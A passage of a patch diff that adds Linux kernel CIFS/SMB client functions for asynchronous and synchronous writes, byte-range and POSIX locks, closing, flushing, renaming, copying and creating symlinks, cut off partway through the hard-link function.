++		 * CountHigh values.
++		 */
++		if (written > wdata->bytes)
++			written &= 0xFFFF;
++
++		if (written < wdata->bytes)
++			wdata->result = -ENOSPC;
++		else
++			wdata->bytes = written;
++		break;
++	case MID_REQUEST_SUBMITTED:
++	case MID_RETRY_NEEDED:
++		wdata->result = -EAGAIN;
++		break;
++	default:
++		wdata->result = -EIO;
++		break;
++	}
++
++	queue_work(cifsiod_wq, &wdata->work);
++	release_mid(mid);
++	add_credits(tcon->ses->server, &credits, 0);
++}
++
++/* cifs_async_writev - send an async write, and set up mid to handle result */
++int
++cifs_async_writev(struct cifs_writedata *wdata,
++		  void (*release)(struct kref *kref))
++{
++	int rc = -EACCES;
++	WRITE_REQ *smb = NULL;
++	int wct;
++	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
++	struct kvec iov[2];
++	struct smb_rqst rqst = { };
++
++	if (tcon->ses->capabilities & CAP_LARGE_FILES) {
++		wct = 14;
++	} else {
++		wct = 12;
++		if (wdata->offset >> 32 > 0) {
++			/* can not handle big offset for old srv */
++			return -EIO;
++		}
++	}
++
++	rc = small_smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **)&smb);
++	if (rc)
++		goto async_writev_out;
++
++	smb->hdr.Pid = cpu_to_le16((__u16)wdata->pid);
++	smb->hdr.PidHigh = cpu_to_le16((__u16)(wdata->pid >> 16));
++
++	smb->AndXCommand = 0xFF;	/* none */
++	smb->Fid = wdata->cfile->fid.netfid;
++	smb->OffsetLow = cpu_to_le32(wdata->offset & 0xFFFFFFFF);
++	if (wct == 14)
++		smb->OffsetHigh = cpu_to_le32(wdata->offset >> 32);
++	smb->Reserved = 0xFFFFFFFF;
++	smb->WriteMode = 0;
++	smb->Remaining = 0;
++
++	smb->DataOffset =
++	    cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
++
++	/* 4 for RFC1001 length + 1 for BCC */
++	iov[0].iov_len = 4;
++	iov[0].iov_base = smb;
++	iov[1].iov_len = get_rfc1002_length(smb) + 1;
++	iov[1].iov_base = (char *)smb + 4;
++
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 2;
++	rqst.rq_pages = wdata->pages;
++	rqst.rq_offset = wdata->page_offset;
++	rqst.rq_npages = wdata->nr_pages;
++	rqst.rq_pagesz = wdata->pagesz;
++	rqst.rq_tailsz = wdata->tailsz;
++
++	cifs_dbg(FYI, "async write at %llu %u bytes\n",
++		 wdata->offset, wdata->bytes);
++
++	smb->DataLengthLow = cpu_to_le16(wdata->bytes & 0xFFFF);
++	smb->DataLengthHigh = cpu_to_le16(wdata->bytes >> 16);
++
++	if (wct == 14) {
++		inc_rfc1001_len(&smb->hdr, wdata->bytes + 1);
++		put_bcc(wdata->bytes + 1, &smb->hdr);
++	} else {
++		/* wct == 12 */
++		struct smb_com_writex_req *smbw =
++				(struct smb_com_writex_req *)smb;
++		inc_rfc1001_len(&smbw->hdr, wdata->bytes + 5);
++		put_bcc(wdata->bytes + 5, &smbw->hdr);
++		iov[1].iov_len += 4; /* pad bigger by four bytes */
++	}
++
++	kref_get(&wdata->refcount);
++	rc = cifs_call_async(tcon->ses->server, &rqst, NULL,
++			     cifs_writev_callback, NULL, wdata, 0, NULL);
++
++	if (rc == 0)
++		cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
++	else
++		kref_put(&wdata->refcount, release);
++
++async_writev_out:
++	cifs_small_buf_release(smb);
++	return rc;
++}
++
++int
++CIFSSMBWrite2(const unsigned int xid, struct cifs_io_parms *io_parms,
++	      unsigned int *nbytes, struct kvec *iov, int n_vec)
++{
++	int rc;
++	WRITE_REQ *pSMB = NULL;
++	int wct;
++	int smb_hdr_len;
++	int resp_buf_type = 0;
++	__u32 pid = io_parms->pid;
++	__u16 netfid = io_parms->netfid;
++	__u64 offset = io_parms->offset;
++	struct cifs_tcon *tcon = io_parms->tcon;
++	unsigned int count = io_parms->length;
++	struct kvec rsp_iov;
++
++	*nbytes = 0;
++
++	cifs_dbg(FYI, "write2 at %lld %d bytes\n", (long long)offset, count);
++
++	if (tcon->ses->capabilities & CAP_LARGE_FILES) {
++		wct = 14;
++	} else {
++		wct = 12;
++		if ((offset >> 32) > 0) {
++			/* can not handle big offset for old srv */
++			return -EIO;
++		}
++	}
++	rc = small_smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
++
++	/* tcon and ses pointer are checked in smb_init */
++	if (tcon->ses->server == NULL)
++		return -ECONNABORTED;
++
++	pSMB->AndXCommand = 0xFF;	/* none */
++	pSMB->Fid = netfid;
++	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
++	if (wct == 14)
++		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
++	pSMB->Reserved = 0xFFFFFFFF;
++	pSMB->WriteMode = 0;
++	pSMB->Remaining = 0;
++
++	pSMB->DataOffset =
++	    cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
++
++	pSMB->DataLengthLow = cpu_to_le16(count & 0xFFFF);
++	pSMB->DataLengthHigh = cpu_to_le16(count >> 16);
++	/* header + 1 byte pad */
++	smb_hdr_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 1;
++	if (wct == 14)
++		inc_rfc1001_len(pSMB, count + 1);
++	else /* wct == 12 */
++		inc_rfc1001_len(pSMB, count + 5); /* smb data starts later */
++	if (wct == 14)
++		pSMB->ByteCount = cpu_to_le16(count + 1);
++	else /* wct == 12 */ /* bigger pad, smaller smb hdr, keep offset ok */ {
++		struct smb_com_writex_req *pSMBW =
++				(struct smb_com_writex_req *)pSMB;
++		pSMBW->ByteCount = cpu_to_le16(count + 5);
++	}
++	iov[0].iov_base = pSMB;
++	if (wct == 14)
++		iov[0].iov_len = smb_hdr_len + 4;
++	else /* wct == 12 pad bigger by four bytes */
++		iov[0].iov_len = smb_hdr_len + 8;
++
++	rc = SendReceive2(xid, tcon->ses, iov, n_vec + 1, &resp_buf_type, 0,
++			  &rsp_iov);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
++	if (rc) {
++		cifs_dbg(FYI, "Send error Write2 = %d\n", rc);
++	} else if (resp_buf_type == 0) {
++		/* presumably this can not happen, but best to be safe */
++		rc = -EIO;
++	} else {
++		WRITE_RSP *pSMBr = (WRITE_RSP *)rsp_iov.iov_base;
++		*nbytes = le16_to_cpu(pSMBr->CountHigh);
++		*nbytes = (*nbytes) << 16;
++		*nbytes += le16_to_cpu(pSMBr->Count);
++
++		/*
++		 * Mask off high 16 bits when bytes written as returned by the
++		 * server is greater than bytes requested by the client. OS/2
++		 * servers are known to set incorrect CountHigh values.
++		 */
++		if (*nbytes > count)
++			*nbytes &= 0xFFFF;
++	}
++
++	free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
++int cifs_lockv(const unsigned int xid, struct cifs_tcon *tcon,
++	       const __u16 netfid, const __u8 lock_type, const __u32 num_unlock,
++	       const __u32 num_lock, LOCKING_ANDX_RANGE *buf)
++{
++	int rc = 0;
++	LOCK_REQ *pSMB = NULL;
++	struct kvec iov[2];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++	__u16 count;
++
++	cifs_dbg(FYI, "cifs_lockv num lock %d num unlock %d\n",
++		 num_lock, num_unlock);
++
++	rc = small_smb_init(SMB_COM_LOCKING_ANDX, 8, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->Timeout = 0;
++	pSMB->NumberOfLocks = cpu_to_le16(num_lock);
++	pSMB->NumberOfUnlocks = cpu_to_le16(num_unlock);
++	pSMB->LockType = lock_type;
++	pSMB->AndXCommand = 0xFF; /* none */
++	pSMB->Fid = netfid; /* netfid stays le */
++
++	count = (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	iov[0].iov_base = (char *)pSMB;
++	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4 -
++			 (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
++	iov[1].iov_base = (char *)buf;
++	iov[1].iov_len = (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
++
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
++	rc = SendReceive2(xid, tcon->ses, iov, 2, &resp_buf_type,
++			  CIFS_NO_RSP_BUF, &rsp_iov);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(FYI, "Send error in cifs_lockv = %d\n", rc);
++
++	return rc;
++}
++
++int
++CIFSSMBLock(const unsigned int xid, struct cifs_tcon *tcon,
++	    const __u16 smb_file_id, const __u32 netpid, const __u64 len,
++	    const __u64 offset, const __u32 numUnlock,
++	    const __u32 numLock, const __u8 lockType,
++	    const bool waitFlag, const __u8 oplock_level)
++{
++	int rc = 0;
++	LOCK_REQ *pSMB = NULL;
++/*	LOCK_RSP *pSMBr = NULL; */ /* No response data other than rc to parse */
++	int bytes_returned;
++	int flags = 0;
++	__u16 count;
++
++	cifs_dbg(FYI, "CIFSSMBLock timeout %d numLock %d\n",
++		 (int)waitFlag, numLock);
++	rc = small_smb_init(SMB_COM_LOCKING_ANDX, 8, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	if (lockType == LOCKING_ANDX_OPLOCK_RELEASE) {
++		/* no response expected */
++		flags = CIFS_NO_SRV_RSP | CIFS_NON_BLOCKING | CIFS_OBREAK_OP;
++		pSMB->Timeout = 0;
++	} else if (waitFlag) {
++		flags = CIFS_BLOCKING_OP; /* blocking operation, no timeout */
++		pSMB->Timeout = cpu_to_le32(-1);/* blocking - do not time out */
++	} else {
++		pSMB->Timeout = 0;
++	}
++
++	pSMB->NumberOfLocks = cpu_to_le16(numLock);
++	pSMB->NumberOfUnlocks = cpu_to_le16(numUnlock);
++	pSMB->LockType = lockType;
++	pSMB->OplockLevel = oplock_level;
++	pSMB->AndXCommand = 0xFF;	/* none */
++	pSMB->Fid = smb_file_id; /* netfid stays le */
++
++	if ((numLock != 0) || (numUnlock != 0)) {
++		pSMB->Locks[0].Pid = cpu_to_le16(netpid);
++		/* BB where to store pid high? */
++		pSMB->Locks[0].LengthLow = cpu_to_le32((u32)len);
++		pSMB->Locks[0].LengthHigh = cpu_to_le32((u32)(len>>32));
++		pSMB->Locks[0].OffsetLow = cpu_to_le32((u32)offset);
++		pSMB->Locks[0].OffsetHigh = cpu_to_le32((u32)(offset>>32));
++		count = sizeof(LOCKING_ANDX_RANGE);
++	} else {
++		/* oplock break */
++		count = 0;
++	}
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	if (waitFlag)
++		rc = SendReceiveBlockingLock(xid, tcon, (struct smb_hdr *) pSMB,
++			(struct smb_hdr *) pSMB, &bytes_returned);
++	else
++		rc = SendReceiveNoRsp(xid, tcon->ses, (char *)pSMB, flags);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
++	if (rc)
++		cifs_dbg(FYI, "Send error in Lock = %d\n", rc);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++	since file handle passed in no longer valid */
++	return rc;
++}
++
++int
++CIFSSMBPosixLock(const unsigned int xid, struct cifs_tcon *tcon,
++		const __u16 smb_file_id, const __u32 netpid,
++		const loff_t start_offset, const __u64 len,
++		struct file_lock *pLockData, const __u16 lock_type,
++		const bool waitFlag)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	struct smb_com_transaction2_sfi_rsp *pSMBr = NULL;
++	struct cifs_posix_lock *parm_data;
++	int rc = 0;
++	int timeout = 0;
++	int bytes_returned = 0;
++	int resp_buf_type = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++
++	cifs_dbg(FYI, "Posix Lock\n");
++
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMBr = (struct smb_com_transaction2_sfi_rsp *)pSMB;
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	count = sizeof(struct cifs_posix_lock);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000); /* BB find max SMB from sess */
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	if (pLockData)
++		pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
++	else
++		pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	parm_data = (struct cifs_posix_lock *)
++			(((char *)pSMB) + offset + 4);
++
++	parm_data->lock_type = cpu_to_le16(lock_type);
++	if (waitFlag) {
++		timeout = CIFS_BLOCKING_OP; /* blocking operation, no timeout */
++		parm_data->lock_flags = cpu_to_le16(1);
++		pSMB->Timeout = cpu_to_le32(-1);
++	} else
++		pSMB->Timeout = 0;
++
++	parm_data->pid = cpu_to_le32(netpid);
++	parm_data->start = cpu_to_le64(start_offset);
++	parm_data->length = cpu_to_le64(len);  /* normalize negative numbers */
++
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->Fid = smb_file_id;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_POSIX_LOCK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	if (waitFlag) {
++		rc = SendReceiveBlockingLock(xid, tcon, (struct smb_hdr *) pSMB,
++			(struct smb_hdr *) pSMBr, &bytes_returned);
++	} else {
++		iov[0].iov_base = (char *)pSMB;
++		iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
++		rc = SendReceive2(xid, tcon->ses, iov, 1 /* num iovecs */,
++				&resp_buf_type, timeout, &rsp_iov);
++		pSMBr = (struct smb_com_transaction2_sfi_rsp *)rsp_iov.iov_base;
++	}
++	cifs_small_buf_release(pSMB);
++
++	if (rc) {
++		cifs_dbg(FYI, "Send error in Posix Lock = %d\n", rc);
++	} else if (pLockData) {
++		/* lock structure can be returned on get */
++		__u16 data_offset;
++		__u16 data_count;
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < sizeof(*parm_data)) {
++			rc = -EIO;      /* bad smb */
++			goto plk_err_exit;
++		}
++		data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++		data_count  = le16_to_cpu(pSMBr->t2.DataCount);
++		if (data_count < sizeof(struct cifs_posix_lock)) {
++			rc = -EIO;
++			goto plk_err_exit;
++		}
++		parm_data = (struct cifs_posix_lock *)
++			((char *)&pSMBr->hdr.Protocol + data_offset);
++		if (parm_data->lock_type == cpu_to_le16(CIFS_UNLCK))
++			pLockData->fl_type = F_UNLCK;
++		else {
++			if (parm_data->lock_type ==
++					cpu_to_le16(CIFS_RDLCK))
++				pLockData->fl_type = F_RDLCK;
++			else if (parm_data->lock_type ==
++					cpu_to_le16(CIFS_WRLCK))
++				pLockData->fl_type = F_WRLCK;
++
++			pLockData->fl_start = le64_to_cpu(parm_data->start);
++			pLockData->fl_end = pLockData->fl_start +
++				(le64_to_cpu(parm_data->length) ?
++				 le64_to_cpu(parm_data->length) - 1 : 0);
++			pLockData->fl_pid = -le32_to_cpu(parm_data->pid);
++		}
++	}
++
++plk_err_exit:
++	free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++	   since file handle passed in no longer valid */
++
++	return rc;
++}
++
++
++int
++CIFSSMBClose(const unsigned int xid, struct cifs_tcon *tcon, int smb_file_id)
++{
++	int rc = 0;
++	CLOSE_REQ *pSMB = NULL;
++	cifs_dbg(FYI, "In CIFSSMBClose\n");
++
++/* do not retry on dead session on close */
++	rc = small_smb_init(SMB_COM_CLOSE, 3, tcon, (void **) &pSMB);
++	if (rc == -EAGAIN)
++		return 0;
++	if (rc)
++		return rc;
++
++	pSMB->FileID = (__u16) smb_file_id;
++	pSMB->LastWriteTime = 0xFFFFFFFF;
++	pSMB->ByteCount = 0;
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_closes);
++	if (rc) {
++		if (rc != -EINTR) {
++			/* EINTR is expected when user ctl-c to kill app */
++			cifs_dbg(VFS, "Send error in Close = %d\n", rc);
++		}
++	}
++
++	/* Since session is dead, file will be closed on server already */
++	if (rc == -EAGAIN)
++		rc = 0;
++
++	return rc;
++}
++
++int
++CIFSSMBFlush(const unsigned int xid, struct cifs_tcon *tcon, int smb_file_id)
++{
++	int rc = 0;
++	FLUSH_REQ *pSMB = NULL;
++	cifs_dbg(FYI, "In CIFSSMBFlush\n");
++
++	rc = small_smb_init(SMB_COM_FLUSH, 1, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->FileID = (__u16) smb_file_id;
++	pSMB->ByteCount = 0;
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_flushes);
++	if (rc)
++		cifs_dbg(VFS, "Send error in Flush = %d\n", rc);
++
++	return rc;
++}
++
++int
++CIFSSMBRename(const unsigned int xid, struct cifs_tcon *tcon,
++	      const char *from_name, const char *to_name,
++	      struct cifs_sb_info *cifs_sb)
++{
++	int rc = 0;
++	RENAME_REQ *pSMB = NULL;
++	RENAME_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len, name_len2;
++	__u16 count;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In CIFSSMBRename\n");
++renameRetry:
++	rc = smb_init(SMB_COM_RENAME, 1, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->BufferFormat = 0x04;
++	pSMB->SearchAttributes =
++	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
++			ATTR_DIRECTORY);
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->OldFileName,
++					      from_name, PATH_MAX,
++					      cifs_sb->local_nls, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++		pSMB->OldFileName[name_len] = 0x04;	/* pad */
++	/* protocol requires ASCII signature byte on Unicode string */
++		pSMB->OldFileName[name_len + 1] = 0x00;
++		name_len2 =
++		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
++				       to_name, PATH_MAX, cifs_sb->local_nls,
++				       remap);
++		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
++		name_len2 *= 2;	/* convert to bytes */
++	} else {
++		name_len = copy_path_name(pSMB->OldFileName, from_name);
++		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, to_name);
++		pSMB->OldFileName[name_len] = 0x04;  /* 2nd buffer format */
++		name_len2++;	/* signature byte */
++	}
++
++	count = 1 /* 1st signature byte */  + name_len + name_len2;
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_renames);
++	if (rc)
++		cifs_dbg(FYI, "Send error in rename = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto renameRetry;
++
++	return rc;
++}
++
++int CIFSSMBRenameOpenFile(const unsigned int xid, struct cifs_tcon *pTcon,
++		int netfid, const char *target_name,
++		const struct nls_table *nls_codepage, int remap)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	struct smb_com_transaction2_sfi_rsp *pSMBr = NULL;
++	struct set_file_rename *rename_info;
++	char *data_offset;
++	char dummy_string[30];
++	int rc = 0;
++	int bytes_returned = 0;
++	int len_of_str;
++	__u16 params, param_offset, offset, count, byte_count;
++
++	cifs_dbg(FYI, "Rename to File by handle\n");
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, pTcon, (void **) &pSMB,
++			(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	data_offset = (char *)(pSMB) + offset + 4;
++	rename_info = (struct set_file_rename *) data_offset;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000); /* BB find max SMB from sess */
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	/* construct random name ".cifs_tmp<inodenum><mid>" */
++	rename_info->overwrite = cpu_to_le32(1);
++	rename_info->root_fid  = 0;
++	/* unicode only call */
++	if (target_name == NULL) {
++		sprintf(dummy_string, "cifs%x", pSMB->hdr.Mid);
++		len_of_str =
++			cifsConvertToUTF16((__le16 *)rename_info->target_name,
++					dummy_string, 24, nls_codepage, remap);
++	} else {
++		len_of_str =
++			cifsConvertToUTF16((__le16 *)rename_info->target_name,
++					target_name, PATH_MAX, nls_codepage,
++					remap);
++	}
++	rename_info->target_name_len = cpu_to_le32(2 * len_of_str);
++	count = sizeof(struct set_file_rename) + (2 * len_of_str);
++	byte_count += count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->Fid = netfid;
++	pSMB->InformationLevel =
++		cpu_to_le16(SMB_SET_FILE_RENAME_INFORMATION);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, pTcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&pTcon->stats.cifs_stats.num_t2renames);
++	if (rc)
++		cifs_dbg(FYI, "Send error in Rename (by file handle) = %d\n",
++			 rc);
++
++	cifs_buf_release(pSMB);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
++int
++CIFSSMBCopy(const unsigned int xid, struct cifs_tcon *tcon,
++	    const char *fromName, const __u16 target_tid, const char *toName,
++	    const int flags, const struct nls_table *nls_codepage, int remap)
++{
++	int rc = 0;
++	COPY_REQ *pSMB = NULL;
++	COPY_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len, name_len2;
++	__u16 count;
++
++	cifs_dbg(FYI, "In CIFSSMBCopy\n");
++copyRetry:
++	rc = smb_init(SMB_COM_COPY, 1, tcon, (void **) &pSMB,
++			(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->BufferFormat = 0x04;
++	pSMB->Tid2 = target_tid;
++
++	pSMB->Flags = cpu_to_le16(flags & COPY_TREE);
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->OldFileName,
++					      fromName, PATH_MAX, nls_codepage,
++					      remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++		pSMB->OldFileName[name_len] = 0x04;     /* pad */
++		/* protocol requires ASCII signature byte on Unicode string */
++		pSMB->OldFileName[name_len + 1] = 0x00;
++		name_len2 =
++		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
++				       toName, PATH_MAX, nls_codepage, remap);
++		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
++		name_len2 *= 2; /* convert to bytes */
++	} else {
++		name_len = copy_path_name(pSMB->OldFileName, fromName);
++		pSMB->OldFileName[name_len] = 0x04;  /* 2nd buffer format */
++		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, toName);
++		name_len2++;    /* signature byte */
++	}
++
++	count = 1 /* 1st signature byte */  + name_len + name_len2;
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in copy = %d with %d files copied\n",
++			 rc, le16_to_cpu(pSMBr->CopyCount));
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto copyRetry;
++
++	return rc;
++}
++
++int
++CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon,
++		      const char *fromName, const char *toName,
++		      const struct nls_table *nls_codepage, int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	char *data_offset;
++	int name_len;
++	int name_len_target;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count;
++
++	cifs_dbg(FYI, "In Symlink Unix style\n");
++createSymLinkRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fromName,
++				/* find define for this maxpathcomponent */
++					PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fromName);
++	}
++	params = 6 + name_len;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	data_offset = (char *)pSMB + offset + 4;
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len_target =
++		    cifsConvertToUTF16((__le16 *) data_offset, toName,
++				/* find define for this maxpathcomponent */
++					PATH_MAX, nls_codepage, remap);
++		name_len_target++;	/* trailing null */
++		name_len_target *= 2;
++	} else {
++		name_len_target = copy_path_name(data_offset, toName);
++	}
++
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max on data count below from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + name_len_target;
++	pSMB->DataCount = cpu_to_le16(name_len_target);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_LINK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_symlinks);
++	if (rc)
++		cifs_dbg(FYI, "Send error in SetPathInfo create symlink = %d\n",
++			 rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto createSymLinkRetry;
++
++	return rc;
++}
++
++int
++CIFSUnixCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
++		       const char *fromName, const char *toName,
++		       const struct nls_table *nls_codepage, int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	char *data_offset;
++	int name_len;
++	int name_len_target;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count;
++
++	cifs_dbg(FYI, "In Create Hard link Unix style\n");
++createHardLinkRetry:
